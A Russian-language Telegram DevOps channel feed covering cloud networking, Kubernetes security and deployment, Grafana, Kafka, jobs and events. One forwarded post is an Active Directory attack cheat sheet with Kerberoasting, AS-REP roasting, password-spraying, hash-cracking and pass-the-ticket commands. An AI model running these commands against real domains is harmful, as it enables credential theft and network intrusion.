KazDevOps – Telegram
KazDevOps
5.38K subscribers
1.3K photos
27 videos
19 files
1.3K links
Канал о DevOps во всех проявлениях: K8s, CI/CD, AppSec, AI/ML, Cloud, Linux
Поможем с DevOps: https://core247.kz/
По рекламе @UlKonovalova
Download Telegram
☄️ Шпаргалка по Cloud Network Components

Эта шпаргалка предлагает краткую сводку по ключевым сетевым элементам основных поставщиков облачных услуг.

Сетевые компоненты — основа облачной инфраструктуры, которая гарантирует подключение, масштабируемость и функциональность облачных сервисов.

Это маршрутизаторы, подсистемы балансировки нагрузки и брандмауэры. Они обеспечивают безопасный обмен данными между серверами и клиентами. А CDN оптимизируют доставку контента, кэшируя данные на периферии, уменьшая задержки и улучшая взаимодействие с пользователем.

Все сетевые элементы работают вместе, чтобы создать надежную и быстро реагирующую облачную экосистему.

👉 Расскажите в комментариях, какие у вас были сложности настройки и управления этими сетевыми компонентами? Возможно, кто-то другой их уже проходил и может подсказать вам 😉

#devops #cloud

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥21
Набор рекомендаций по безопасности развертывания Kubernetes.

Цель этого контрольного списка — систематизировать подход к безопасности кластера Kubernetes и обеспечить выполнение всех шагов для защиты кластера от угроз.

Он дает организациям отправную точку для оценки безопасности развертывания Kubernetes и внесения любых изменений для полной защиты.

Рекомендации списка разбиты по категориям:
Аутентификация и авторизация
Секреты
Безопасность конфигурации кластера
Аудит и регистрация
Безопасная конфигурация ОС
Сетевая безопасность
Безопасная настройка рабочих нагрузок
Безопасная сборка образа

Следуйте рекомендациям и вы предпримете важные шаги для защиты сред Kubernetes 🤝

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥52👍1
☄️ Список бесплатных курсов и сертификаций от Cloud Study Network — глобального технологического сообщества, которое делится знаниями.

В их репозитории собраны ссылки от различных вендоров. Среди них: Gitlab, Oracle, Azure, Microsoft, Google, Elastic и множество других.

_____________________

Если хотите учиться на русском, рассмотрите курсы от Слёрм — по Kubernetes, DevOps, SRE, Безопасности, Работе с данными, IaC и другим скиллам. Граждане Казахстана могут купить их в рассрочку от Kaspi либо по региональной скидке от 10%.

Условия только для наших подписчиков 🫡

Пользуйтесь и делитесь с коллегами 🤝

#devops #k8s #kubernetes #iac #sre #learning

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍52🔥2
☄️ Релиз Grafana 10.2

Grafana — система визуализации данных, ориентированная на данные систем ИТ-мониторинга. Новая версия Grafana содержит улучшения по части дашбордов и визуализации данных. Теперь дашборды по-настоящему дашборды и интерактивные!

Появились кнопки визуализации на панелях, автоматически сгенерированные заголовки и описания панелей.

В Grafana Enterprise также добавили новые инструменты, которые помогут лучше управлять разрешениями учетных записей пользователей и служб.

Есть и улучшения, которые оптимизируют процессы оповещения, улучшают навигацию по результатам трассировки.

👉 Полный список изменений можно узнать здесь

#devops #grafana

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
2👍2🔥1
3 ноября состоится открытая online-встреча CISO EURASIA 2023

Спикеры:

TSARKA, ISACA, Toimrat, Eurasian Digital Foundation, Air Astana, Казминералс, PwC Kazakhstan, Kcell, Комитет Информационной Безопасности МЦРИАП РК и др.

Ключевые темы:
Обеспечение киберустойчивости в регионе: рабочие стратегии;
Взгляд в будущее: глобальные тренды промышленной кибербезопасности;
Практика: опыт разработки стратегии ИБ и киберзащиты производственной инфраструктуры;
Мошенники идут в ногу со временем: как развивать механизмы антифрода;
Персональные данные: диалог с регулятором;
В тренде: развитие нейросетей и риски, связанные с ИИ;
Дискуссионный клуб: роль CISO в общей и цифровой стратегии компании;
ИБ компетенции: какие навыки востребованы для ИБ руководителей и их команд;
Инициативы по повышению осведомленности, проблемы при разработке и внедрении AWARENESS программ.
3🔥3
This media is not supported in your browser
VIEW IN TELEGRAM
☄️ RecoverPy — мощный инструмент, который использует возможности вашей системы для восстановления удаленных файлов. Полезно, если вы как и мы иногда чистите те же загрузки, а потом вспоминаете, что там было кое-что важное.

В отличие от других программ, вы можете не только восстанавливать удаленные файлы, но и перезаписывать данные.

Нужен только Linux и права root.
Please open Telegram to view this post
VIEW IN TELEGRAM
33🔥3
Infra + K8s: KZ

7 ноября приглашаем DevOps и DevSecOps, архитекторов и разработчиков, специалистов ИБ и SRE-инженеров.

Вас ждут технические доклады, продуктовые обзоры и передовые практики от ведущих разработчиков и экспертов по контейнерным технологиям. Эксперты поделятся кейсами и расскажут, как Kubernetes® помогает решать задачи разработки и бизнеса. Ну и конечно, поговорим про облака и безопасность.

А ещё расскажем о том, как мы создаём и развиваем платформу для эффективной работы внутри Yandex Cloud.

Эксперты из Yandex Cloud, AirAstana, Aviata, Kolesa Group, Rocketdata.

Техноконтент, нетворкинг-сессия и афтерпати, и всё это — в очень атмосферном месте.

Адрес: Hazbin, Алматы, улица Байтурсынова, 141.
Время: с 12:00 до 20:00.

Участие бесплатное, но необходима регистрация.
🔥8👍32
Маск критиковал затраты и сложность бывшего Twitter, а ныне платформы X. Это не всегда было красиво, но определенно эффективно. Сайт не только работает, несмотря на кадровые изменения, но и все больше экспериментирует.

Например, он сделал #CloudExit ключевым компонентом программы экономии средств. Вот что говорят об этом его инженеры:

«Сократили затраты на облачных поставщиков и многое вернули на локальную базу. Перенесли все media/blob artifacts из облако и сократили его объем на 60%. Так мы уменьшили ежемесячные расходы на облако на 60%, а затраты на обработку облачных данных на 75%»

А в рамках проекта Х их затраты — это 100 миллионов долларов в год на AWS. Просто вышли из облака и сделали это командой, которая вчетверо меньше той, что была раньше. Иногда и такие меры работают!

#devops #cloud
🔥163😎2👍1
Стратегии развертывания Kubernetes 👆

Повторное создание (Recreate)

Сперва удаление текущей версии приложения, затем развертывание новой версии.

Постепенное развертывание (Rolling)

Все инстансы приложения будут последовательно обновляться до новой версии.

Сине-зеленое развертывание (Blue/Green)

Эта стратегия базируется на двух продуктивных средах: «синяя» — там, где живут старые версии приложения, и «зеленая» — зона, где мы запускаем новую версию приложения.

Канареечное развертывание (Canary)

«Канареечный» деплой схож с зелено-синей стратегией. Часть текущих инстансов приложения заменяется новой версией, на которую переключается часть трафика.

A/B testing

Обычно это стратегия принятия бизнес-решений на основе статистики. Она может быть реализована путем добавления к Canary дополнительной функциональности при определенных условиях. Например, куки браузера, язык или параметры запроса. Вместо того, чтобы открыть доступ к новой функции всем пользователям, ее предлагают лишь ограниченной их части.

Shadow

Теневое развертывание заключается в выпуске версии 1.1 наряду с версией 1.0, перехвате входящих запросов с первой версии и отправке на вторую без влияния на трафик. Это особенно полезно для тестирования production нагрузки на новую функцию.

Каждая стратегия предлагает свой подход к управлению обновлениями.

#devops #kubernetes #k8s

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
5👍4🔥3
🗣Внимание, конкурс!

Разыгрываем 7 ваучеров на бесплатное обучение и сертификацию от Cloud Native Computing Foundation. Ваучеры дают 100% скидку на курс или экзамен по Kubernetes из списка ниже до 23 февраля — и мы хотим ими поделиться:

🟣 CKA certification exam
🟣 CKAD certification exam
🟣 CKS certification exam
🟣 Обучение LFS258 Kubernetes Fundamentals
🟣 Обучение LFS260 Kubernetes Security Essentials
🟣 Обучение LFD259 Kubernetes для разработчиков
🟣 Пакет LFS258+CKA (обучение + экзамен)
🟣 Пакет LFD259+CKAD (обучение + экзамен)
🟣 Пакет LFS260+CKS (обучение + экзамен)

Мы хотим, чтобы сообщество DevOps развивалось, поэтому условия розыгрыша просты.

🔵 Подпишитесь на KazDevOps и оставьте комментарий с профилем коллеги (@username) из DevOps и смежных сфер под этим постом.

🚩 Комментарий обязательно оставлять в официальном аккаунте KazDevOps

🥳 13 ноября подведем итоги и выберем 7 победителей методом генерации случайных чисел. Каждый получит по ваучеру. Go-go-go, и успехов!

#kubernetes #cka #ckad #cks #k8s #linuxfoundation #cncf

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥17👍82🏆2
KazDevOps pinned a photo
☄️ Шпаргалка по дизайну-системы, у которой более 42 тысяч звёзд на GitHub — это вам не шутки 😉

Она будет интересна всем, кто хоть как-то связан с разработкой ПО. Добавив её в закладки, вы получите огромную библиотеку о таких вещах, как:

протоколы коммуникации
DevOps, CI/CD
архитектурные паттерны
базы данных
кэширование
микросервисы (и монолиты)
платежные системы
облачные сервисы и так далее

Особо хвалят диаграммы.

🚩 Ещё одна приятная новость в том, что она есть и на русском. Пользуйтесь и делитесь с коллегами!

#devops #cheatsheet

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8🔥7👾2
Forwarded from Похек (Sergey Zybnev)
Kerberoast. Когда крадешь билеты на концерт, но не знаешь, как их использовать.
Kerberoast - это метод атаки, который используется для получения хешей паролей пользователей в Windows домене, которые будет возможно сбрутить в оффлайн режиме.

➡️ Инструменты:
Rubeus
Kerbrute
Impacket
PsExec

➡️ ASREP-Roast

➡️ Impacket
Проверка ASREP для всех пользователей домена (Требуются валидные данные учетной записи)
python2 GetNPUsers.py <Domain>/<User>:<Password> -request -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"

Проверка ASREP по списку пользователей домена (не требует доменных учетных данных)
python2 GetNPUsers.py <Domain> -usersfile <UserList>  -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"

➡️ Rubeus
Извлечение из всех учетных записей домена
.\Rubeus.exe asreproast
.\Rubeus.exe asreproast /format:hashcat /outfile:C:Hashes.txt

➡️ Cracking
Windows
hashcat64.exe -m 18200 c:Hashes.txt rockyou.txt

Linux
john --wordlist rockyou.txt Hashes.txt --format=krb5tgs
hashcat -m 18200 -a 3 Hashes.txt rockyou

➡️ Brute Force

➡️ Kerbrute
./kerbrute userenum <UserList> --dc <IP> --domain <Domain>

➡️ Rubeus
со списком пользователей
.\Rubeus.exe brute /users:<UserList> /passwords:<Wordlist> /domain:<Domain>

Kerberos-based Password Spraying
.\Rubeus.exe brute /passwords:<Wordlist>

➡️ Kerberoasting

➡️ Impacket
GetUserSPNs.py <Domain>/<User>:<Password> -dc-ip <IP> -request

➡️ Rubeus
Kerberoast всех пользователей домена
.\Rubeus kerberoast

Все пользователи в поздразделении OU
.\Rubeus.exe kerberoast /ou:OU=Service_Accounts,DC=Security,DC=local

Атака на конкретных пользователей
.\Rubeus.exe kerberoast /user:File_SVC

➡️ Pass-The-Ticket

➡️ Mimikatz
Сбор тикетов
sekurlsa::tickets /export

Инжект тикета
kerberos::ptt <.kirbi file>

Создать CMD с инжектированным тикетом
misc::cmd

➡️ Rubeus
Дамп тикетов
.\Rubeus.exe dump

Инжект тикета
.\Rubeus.exe ptt /ticket:<.kirbi file>

➡️ PsExec
Используется после инъекции тикетов через Rubeus или Mimikatz
.\PsExec.exe -accepteula \\<IP> cmd

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4😎2👍1
Grafana Tempo — инструмент трассировки с открытым исходным кодом. И на днях состоялся релиз версии 2.3. Рассказываем, что это и почему важно.

🚩 Немного справки: для его работы требуется только объектное хранилище, типа Google Cloud Storage или Amazon S3. Он позволяет принимать, записывать и хранить полные пути чтения наших производственных и тестовых окружений, а также окружений для разработки. Совместим с OpenTelemetry и Opentracing и интегрируется с другими инструментами, вроде Prometheus.

🚩 Что нового в Tempo 2.3:

гораздо более производительные запросы TraceQL
задержка поиска сильно сокращена за счёт новой версии бэкенда
новые структурные операторы: например, для поиска фрагментов HTTP-запросов
функция, которая показывает, какие ошибки или сообщения возникают в вашем кластере
полная поддержка атрибутов OpenTelemetry

🤝 Дальше — еще круче. Делитесь с коллегами!

#devops #grafana #trace #grafanatempo #opentelemetry

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍32🔥2
Это база: нюансы работы с Redis. Часть 1

Cерия статей про неочевидные нюансы работы с Redis.

В первой части Петр, DevOps-инженер компании Nixys, подробно рассказал об основных концепциях и понятиях этой БД и подготовил чек-лист, который может помочь вам в оптимизации этого NoSQL решения.

Приятного чтения!
👍7😎4🔥2
Продолжаем делиться опытом по выходным через книги.

👉 Сегодня это — Паттерны Kubernetes. Эта книга адресована разработчикам, желающим проектировать облачные приложения для платформы Kubernetes. Наибольшую пользу из нее извлекут читатели, которые хотя бы немного знакомы с контейнерами и хотят подняться на новый уровень.

Каждый паттерн проектирования представляет собой описание реальной задачи, а решение поддерживается конкретными примерами кода. Прочитав эту книгу, вы узнаете не только о паттернах Kubernetes, но и о том, зачем они нужны и как их использовать.

Читайте и делитесь с коллегами 🤝

#devops #devopsbooks

@DevOpsKaz
👍4🔥4👾21🤮1
☄️ Подборка вакансий на выходные

DevOps инженер, eCapital, 1 500$, Алматы

DevOps инженер, eCapital, 1 500$, Астана

DevOps / Системный администратор Linux (middle/senior) Плейтокс (Playtox), По договоренности, Астана

Специалист Middle по .NET Core со знанием DevOps, ЧАСТНАЯ КОМПАНИЯ WELLDONE SCHOOL LTD, От 1 700$ до 2 600$, Алматы

DevOps Engineer (AWS), Andersen, По договоренности, Алматы

DevOps engineer (Cruise company project), RemoteMaxiru, От 2 900$ до 5 000$, Астана

DevSecOps, Мобайл Телеком-Сервис (Объединенная Компания Tele2/ALTEL), По договоренности, Алматы

#devops #DevOpsИнженер #sre #cv

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍21🔥1
Недавно прошел Data Platform Meetup Kazakhstan, на котором эксперты Yandex Cloud рассказали о технологических трендах ближайших лет и задачах, в которых компаниям помогают сервисы для работы с данными.

Вот самые ключевые выводы:

🟣Демократизация машинного обучения для разных ролей и индустрий — главный тренд. Массивы данных помогают обучать модели ML, а развитие NLP позволяет применять их в аналитике: отзывы клиентов, данные социальных сетей и онлайн-обзоры.

🟣Гибкая платформа данных позволяет бизнесу быстро запускать дата-проекты и быть максимально адаптивным к любым изменениям. Многие компании всё чаще используют облако как гибкую среду для построения корпоративных хранилищ.

🟣Рост спроса на безопасность и контроль данных, а также запрос на простоту работы с BI-инструментами. Компании активно тестируют и внедряют бизнес-аналитику, требуя качественный UI, доступную техподдержку и возможность получать данные в режиме реального времени.

Особенно радует нас то, что казахстанские компании активно применяют сервисы Data Platform для речевой аналитики, разработки голосовых роботов, систем видеоаналитики и рекомендательных сервисов.

#devops #data #bi #dataops #dataplatform

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥421
Kafka — это мощный инструмент, который помогает работать с данными в реальном времени. Предлагаем 6 вариантов, как его использовать на максимум.

👉 Для наглядности держите гифку.

1️⃣ Агрегирование журналов
— Собирает журналы из разных источников и упрощает их анализ
— Надежно и эффективно хранит эти журналы
— Помогает работать с большими объемами данных журналов

2️⃣ Потоковая передача данных
— Позволяет анализировать данные по мере их генерации
— Дает возможность быстро перемещать данные по системе
— Обеспечивает бесперебойную и непрерывную передачу данных

3️⃣ Очередь сообщений
— Надежно хранит сообщения и доставляет их в нужное место
— Следит за тем, чтобы все сообщения были доставлены, даже если есть проблемы с системой
— Позволяет различным частям системы взаимодействовать друг с другом независимо друг от друга

4️⃣ Репликация данных
— Делает бэкап
— Делает вашу систему более устойчивой к сбоям
— Распределяет данные между различными кластерами для повышения производительности

5️⃣ Сбор данных об изменениях
— Отслеживает изменения в ваших данных и сообщает о них другим системам
— Синхронизирует все системы друг с другом
— Помогает поддерживать целостность данных в динамических средах

6️⃣ Мониторинг и оповещение
— Собирает анализирует системные метрики в режиме реального времени
— Отправляет оповещения при возникновении проблем
— Сохраняет метрики для последующего анализа, чтобы вы могли улучшить свою систему

#data #dataanalytics #kafka #apache #devops

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8👍42
Типичные ошибки конфигурации безопасности #kubernetes:

1️⃣ Чрезмерные привилегии. Если вы предоставляете избыточные разрешения контейнерам или модулям, то это может привести к несанкционированному доступу.

2️⃣ Неадекватные сетевые политики. Неспособность определить сетевые политики приводит к неограниченной связи между подами, открывая путь для злоумышленников.

3️⃣ Отсутствие ограничений на ресурсы. Ресурсоемкие приложения могут использовать значительную часть инфраструктуры кластера, что часто приводит к нехватке памяти (OOM).

4️⃣ Чрезмерно допустимые конфигурации RBAC. Когда она предоставляет пользователям или группам больше разрешений, чем необходимо для их задач.

5️⃣ Неправильная конфигурация секретов. Неправильные права доступа, небезопасные методы хранения могут привести к угрозе безопасности и раскрытию конфиденциальных данных.

🫡 Чтобы всё работало правильно, мы в Core 24/7 предлагаем провести аудит ваших кластеров,исправить ошибки или настроить с нуля.

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4🥱2😎2
K8sGPT — инструмент, который дарит SRE-инженерам сверхспособности. Сканирует кластеры, быстро выявляет потенциальные узкие места или аномалии в вашей инфраструктуре и дает действенные рекомендации по их устранению.

K9s
— инструмент командной строки (CLI), который упрощает управление кластером. Отслеживает его деятельность в реальном времени и записывает метрики, связанные с ресурсами кластера. В комплекте мощные средства фильтрации и просмотра.

Lens — интегрированная среда разработки (IDE), которая позволяет разворачивать и управлять кластерами напрямую из консоли, предоставляя ключевые метрики и информацию обо всем, что работает в кластере. С Lens у вас будет ясное представление о том, как работают кластеры и стеки облачных нативных приложений.

Rancher — комплексное ПО, которое решает сложные операционные проблемы и проблемы безопасности при управлении несколькими кластерами Kubernetes. Есть инструменты для работы с рабочими нагрузками. С Rancher можно управлять и развертывать кластеры из централизованного места.

#devops #rancher #lens #k8s #k9s #k8sgpt

@DevOpsKaz
🔥6👍21